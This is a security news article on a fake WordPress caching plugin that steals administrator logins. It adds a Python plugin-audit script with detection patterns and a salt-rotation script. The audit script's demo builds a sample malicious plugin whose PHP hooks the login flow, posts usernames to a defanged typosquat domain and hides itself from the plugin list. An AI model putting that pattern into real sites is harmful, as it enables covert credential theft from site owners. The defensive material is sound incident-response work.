Cybersecurity researchers have identified a new tactic used by attackers to compromise WordPress sites. A fake caching plugin, named wp-runtime-cache, has been discovered hiding in the plugin directory of affected sites. While it appears to be a legitimate performance tool, it is actually designed to steal administrator login details and send them to an external server.
Security researchers at Sucuri, a web security company, found the plugin during a routine malware scan. It had no author information or support links and contained suspicious obfuscated code, and its directory held only a single PHP file, which is unusual for a legitimate, actively maintained plugin.
Further analysis showed that the plugin hooks into the WordPress login process via action hooks. When a user logs in, it captures the username and user role and checks whether the account is an administrator or editor. If so, it collects the login details and posts them to a recently registered domain, woocomerce-check[.]com, whose name imitates WooCommerce with a single "m". The domain appeared to be part of malicious infrastructure: it had been registered recently, and its registration record showed a mismatch between the stated location and the contact details.
The plugin also attempts to hide itself from the list of installed plugins, so an administrator browsing the dashboard's Plugins page would not see it. Together, these tactics show how an attacker can conceal malicious activity and exfiltrate sensitive data without prompt detection.
Regular Review
This incident underscores the importance of vigilance and routine security checks. WordPress site owners and administrators should regularly audit installed plugins, remove unfamiliar or unused ones, and use security scanners or plugins to detect hidden or suspicious files. Because a plugin like this one hides itself from the dashboard, compare the directories actually present under wp-content/plugins with what the Plugins page shows; anything on disk that is missing from the list deserves immediate attention.
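The traits described above (a single-file plugin, missing Author and Plugin URI headers, obfuscation primitives, a hook on the login flow, self-hiding, and an outbound request) can be checked mechanically during the plugin audit the paragraph recommends. The script below is an added example, not Sucuri's scanner or code from the plugin; it walks a wp-content/plugins directory and scores each plugin by how many of those traits it shows. The two sample plugins it builds are constructed for the demo, the helper names in them are made up, the endpoint is written in defanged form, and the use of the all_plugins filter for self-hiding is an assumption about how the concealment is implemented (it is the usual WordPress mechanism; the article does not say which one the plugin uses).

```python
"""Audit a WordPress wp-content/plugins directory for the traits the article
attributes to wp-runtime-cache. Added example; not Sucuri's scanner and not
the plugin's code. The two sample plugins are constructed for the demo, and
hiding via the all_plugins filter is an assumption about the mechanism."""
import re
import tempfile
from pathlib import Path

# Traits worth a closer look. Any single hit can be benign (real caching
# plugins do make HTTP requests); the combination is what stands out.
SIGNATURES = [
    ("login hook", re.compile(r"add_action\(\s*['\"](wp_login|wp_authenticate|login_init)['\"]")),
    ("hides itself from plugin list", re.compile(r"add_filter\(\s*['\"]all_plugins['\"]")),
    ("obfuscation", re.compile(r"\b(base64_decode|gzinflate|str_rot13|eval)\s*\(")),
    ("outbound request", re.compile(r"\b(wp_remote_post|curl_exec|file_get_contents)\s*\(")),
]
HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Plugin URI|Author|Author URI):\s*(.+?)\s*$", re.M)


def parse_headers(src: str) -> dict:
    """Collect the WordPress plugin header fields present in a PHP source."""
    return {m.group(1): m.group(2) for m in HEADER_RE.finditer(src)}


def audit_plugin(plugin_dir: Path) -> dict:
    """Inspect one plugin directory; return its name, findings and score."""
    php_files = sorted(plugin_dir.rglob("*.php"))
    findings = ["single PHP file"] if len(php_files) == 1 else []
    headers = {}
    for f in php_files:
        src = f.read_text(errors="replace")
        headers.update(parse_headers(src))
        for label, rx in SIGNATURES:
            if label not in findings and rx.search(src):
                findings.append(label)
    for field in ("Author", "Plugin URI"):
        if field not in headers:
            findings.append(f"missing {field} header")
    return {"plugin": plugin_dir.name, "findings": findings, "score": len(findings)}


def audit_plugins_dir(plugins_root: Path) -> list:
    """Audit every plugin under plugins_root, most suspicious first."""
    results = [audit_plugin(d) for d in sorted(plugins_root.iterdir()) if d.is_dir()]
    return sorted(results, key=lambda r: -r["score"])


# --- constructed sample site (not real plugins) ------------------------------
GOOD_MAIN = """<?php
/*
Plugin Name: Good Cache
Plugin URI: https://example.com/good-cache
Author: Example Dev
Author URI: https://example.com
*/
add_action('init', 'good_cache_init');
function good_cache_init() { /* warm the object cache */ }
"""
GOOD_HELPER = "<?php\nfunction good_cache_key($k) { return 'gc_' . md5($k); }\n"

# Mimics the traits the article describes; endpoint defanged, names made up.
FAKE_MAIN = """<?php
/*
Plugin Name: WP Runtime Cache
*/
add_action('wp_login', 'wrc_on_login', 10, 2);
function wrc_on_login($login, $user) {
    if (in_array('administrator', $user->roles) || in_array('editor', $user->roles)) {
        $ua = base64_decode('V29yZFByZXNz');
        wp_remote_post('https://woocomerce-check[.]com/', array('body' => array('u' => $login)));
    }
}
add_filter('all_plugins', function ($list) {
    unset($list['wp-runtime-cache/wp-runtime-cache.php']);
    return $list;
});
"""


def build_sample_site() -> Path:
    """Write the two sample plugins into a temporary plugins directory."""
    root = Path(tempfile.mkdtemp()) / "plugins"
    (root / "good-cache" / "includes").mkdir(parents=True)
    (root / "good-cache" / "good-cache.php").write_text(GOOD_MAIN)
    (root / "good-cache" / "includes" / "helpers.php").write_text(GOOD_HELPER)
    (root / "wp-runtime-cache").mkdir()
    (root / "wp-runtime-cache" / "wp-runtime-cache.php").write_text(FAKE_MAIN)
    return root


if __name__ == "__main__":
    import sys
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else build_sample_site()
    for r in audit_plugins_dir(target):
        print(f"{r['plugin']:24} score={r['score']}  {', '.join(r['findings']) or 'ok'}")
```

Run it against a real site with `python audit_plugins.py /var/www/html/wp-content/plugins` (the script name is whatever you save it as). A high score is a prompt to read the file, not a verdict: caching and analytics plugins legitimately call `wp_remote_post`, and the point of the signature list is that the fake plugin trips all of them at once while also lacking the headers a published plugin always carries.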
If you suspect your website has been compromised, it’s advisable to consult cybersecurity professionals promptly.
After any security incident, update the salt keys in wp-config.php to invalidate every existing session. You can use WordPress' official online generator (https://api.wordpress.org/secret-key/1.1/salt/) or learn more about the security keys in WordPress' support article. Because this plugin steals credentials, also reset the passwords of every administrator and editor account: new salts invalidate cookies, not a password the attacker already holds.
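Rotating the salts is a mechanical edit of eight `define()` lines, and doing it by script avoids the copy-paste mistakes that leave one key unchanged. The following is an added example, not WordPress core or Sucuri code (if WP-CLI is installed, `wp config shuffle-salts` does the same job); it replaces all eight constants with fresh values from the operating system's CSPRNG and refuses to produce a partially rotated file. The sample wp-config.php fragment is constructed, and the assumption is that the constants are written in the single-quoted form a standard install uses.

```python
"""Rotate the eight authentication keys and salts in wp-config.php so every
existing login cookie stops validating. Added example, not WordPress core
or Sucuri code. The sample wp-config.php fragment below is constructed, and
the regex assumes the single-quoted define() form of a standard install."""
import re
import secrets
import string
from pathlib import Path

SALT_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
# Printable ASCII minus quotes and backslash, so each value can sit inside a
# single-quoted PHP string without escaping.
ALPHABET = "".join(c for c in string.ascii_letters + string.digits + string.punctuation
                   if c not in "'\"\\")


def new_salt(length: int = 64) -> str:
    """A fresh random salt from the OS CSPRNG (secrets, never random.choice)."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def extract_salts(config_text: str) -> dict:
    """Map each salt constant to its current value, for before/after checks."""
    found = {}
    for key in SALT_KEYS:
        m = re.search(r"define\(\s*'" + key + r"'\s*,\s*'([^']*)'\s*\);", config_text)
        if m:
            found[key] = m.group(1)
    return found


def rotate_salts(config_text: str) -> str:
    """Return config_text with all eight constants replaced by new values.

    Raises ValueError if any constant is missing, so a half-rotated file
    (some sessions still valid) is never written."""
    out = config_text
    for key in SALT_KEYS:
        pattern = re.compile(r"define\(\s*'" + key + r"'\s*,\s*'[^']*'\s*\);")
        value = new_salt()
        # A function replacement stops re from interpreting backslashes or
        # group references that might appear in the random value.
        out, n = pattern.subn(lambda _m, k=key, v=value: f"define( '{k}', '{v}' );", out, count=1)
        if n != 1:
            raise ValueError(f"{key} not found in wp-config.php")
    return out


def rotate_file(path: Path) -> None:
    """Rotate salts in place, keeping a .bak copy of the original."""
    original = path.read_text()
    path.with_name(path.name + ".bak").write_text(original)
    path.write_text(rotate_salts(original))


# Constructed fragment with the placeholder values a fresh install ships with.
SAMPLE_CONFIG = "<?php\n" + "".join(
    f"define( '{k}', 'put your unique phrase here' );\n" for k in SALT_KEYS
) + "$table_prefix = 'wp_';\n"


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        rotate_file(Path(sys.argv[1]))
    else:
        print(rotate_salts(SAMPLE_CONFIG))
```

Run `python rotate_salts.py /var/www/html/wp-config.php` after the site has been cleaned, not before: rotating salts while the malicious plugin is still installed only forces the administrator to log in again through the same hook that captured the first set of credentials.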
Learn more about Sucuri’s findings on their security report.